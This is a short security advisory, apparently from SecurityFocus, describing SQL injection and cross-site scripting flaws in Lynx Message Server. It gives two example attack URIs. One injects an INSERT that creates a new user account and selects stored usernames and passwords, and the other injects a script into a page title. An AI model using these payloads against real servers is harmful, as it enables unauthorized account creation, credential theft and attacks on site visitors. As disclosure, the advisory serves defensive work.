Lynx Message Server SQL Injection and Cross Site Scripting Vulnerabilities

An attacker can exploit these issues with a browser. To exploit cross-site scripting issues, the attacker must entice an unsuspecting victim to follow a malicious URI.

The following example URIs are available.

SQL injection:

http://www.example.com/cgi/email_password.plx?UserID=a'%3BINSERT+INTO+Users([User],[Password])+VALUES+('bede','bede')%3Bselect+Users.[Password],+Users.[User]+from+USERS+where+Users.[User]='b

Cross-site scripting:

http://www.example.com/cgi/wrapper.plx?Destination=addequipment.htm&Title=<script>alert('XSS')</script>


 

Privacy Statement
Copyright 2010, SecurityFocus